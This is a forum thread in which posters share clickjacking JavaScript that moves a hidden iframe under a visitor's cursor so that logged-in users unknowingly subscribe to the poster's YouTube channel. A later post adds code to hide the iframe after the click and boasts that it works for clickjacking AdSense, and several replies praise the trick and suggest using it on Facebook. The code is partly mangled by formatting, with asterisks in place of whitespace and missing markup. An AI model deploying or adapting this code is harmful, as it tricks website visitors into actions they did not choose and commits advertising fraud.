+ Reply to Thread + Post New Thread
Page 1 of 6 12345 ... LastLast
Results 1 to 10 of 55

Thread: ClickJacking / Auto Subscribe YouTube

  1. #1
    Noobie
    Join Date
    Apr 2008
    Posts
    257
    Thanks
    0
    Thanked 3 Times in 1 Post

    Default ClickJacking / Auto Subscribe YouTube

    I just write a piece of code to make your visitors (who logged in youtube) auto subscribe to you.

    Example html file
    Code:
    ****
    ********Auto Youtube Subscription
    ****
    ****
    ********Hello !!! Welcome to my site!
    ****
    ********
    ****
    ****
    ********var iflag = 0;
    ** *var icontainer = document.getElementById('icontainer');
    ** *var iframe = document.getElementById('i_frame');
    ** *function mouseFollower(e){
    ** * * */* * * * * * * * * * *DO NOT EDIT THIS * * * * * * * * * * * * */
    ** * * *x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
    ** * * *y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
    ** * * */* ------------------------------------------------------------*/
    ** * * */* places the iframe at the tip of the cursor, to make it clickable */
    ** * * *icontainer.style.left = (x - 13) + 'px';
    ** * * *icontainer.style.top = (y - 35) + 'px';
    ** *}
    ** *document.onmousemove = function(e) {
    ** *****if (iflag == 0) {
    ** *********mouseFollower(e);
    ** *****}
    ** *}
    ****
    ****
    Insert before your :
    Code:
    ****
    ********
    ****
    ****
    ********var iflag = 0;
    ** *var icontainer = document.getElementById('icontainer');
    ** *var iframe = document.getElementById('i_frame');
    ** *function mouseFollower(e){
    ** * * */* * * * * * * * * * *DO NOT EDIT THIS * * * * * * * * * * * * */
    ** * * *x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
    ** * * *y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
    ** * * */* ------------------------------------------------------------*/
    ** * * */* places the iframe at the tip of the cursor, to make it clickable */
    ** * * *icontainer.style.left = (x - 13) + 'px';
    ** * * *icontainer.style.top = (y - 35) + 'px';
    ** *}
    ** *document.onmousemove = function(e) {
    ** *****if (iflag == 0) {
    ** *********mouseFollower(e);
    ** *****}
    ** *}
    ****
    Enjoy!

    Please give feedback, I'm currently finding a solution to hide the iframe after clicked.

  2. The Following 3 Users Say Thank You to youngguy For This Useful Post:

    gregorysmith (03-13-2011), Mehedi (12-07-2011), viista (03-15-2011)

  3. Shorten URL    SEO Services    Buy Xrumer

    Sponsored Links

  4. #2
    Noobie
    Join Date
    Apr 2008
    Posts
    65
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    This will be great for the youtube video websites out there.

  5. #3
    Noobie
    Join Date
    Apr 2008
    Posts
    76
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Sweet. I don't have any immediate use, but I learned something from reading the code. Thanks!

  6. #4
    Noobie
    Join Date
    Apr 2008
    Posts
    257
    Thanks
    0
    Thanked 3 Times in 1 Post

    Default

    Did anyone know how to hide this iframe after clicked? I can't control it

  7. #5
    Noobie
    Join Date
    Apr 2008
    Posts
    65
    Thanks
    0
    Thanked 1 Time in 1 Post

    Default

    I found out how

    My first share in JV too.
    My code, don't share or i'll shoot.
    PHP Code:


    3. After that put this frame
    () function code in page1.html:

    var 
    k=1;
    function 
    frame()
    {
    if(
    k>=2)

    //elementToSet.style.visibility = "hidden";
    // parent.window.location = "yourthanksform.html";
    ** * *document.all.myFrame.src=val;
    ** * *
    document.all.myFrame.style.visibility="hidden";
    k=k+1;

    Code untested for Youtube, but it works for clickjacking adsense. It's fucking brilliant, if i do say so myself. (I've been looking for the fix for a looooooooooooooooong time)

  8. The Following User Says Thank You to shadowpwner For This Useful Post:

    likewhoa (12-18-2010)

  9. #6
    Noobie
    Join Date
    Apr 2008
    Posts
    95
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    this is really cool

    if you have a large whitehat blog, you could put this code in and have your readers be instant followers to all your youtube material. i can see how this could shoot your account to the top fast

  10. #7
    Noobie
    Join Date
    Apr 2008
    Posts
    257
    Thanks
    0
    Thanked 3 Times in 1 Post

    Default

    cool! thanks! I will test it out

  11. #8
    Noobie
    Join Date
    Apr 2008
    Posts
    45
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Nice.. i definately will watch this.. for updates.. especially the clickjacking for @dsense.

  12. #9
    Noobie
    Join Date
    Apr 2008
    Posts
    17
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    This looks very interesting, maybe it can be used with FB to for friends/pages/groups.

  13. #10
    Noobie
    Join Date
    Apr 2008
    Posts
    25
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    You guys are brilliant! :-) Thank you so much for sharing your work!

+ Reply to Thread
Page 1 of 6 12345 ... LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts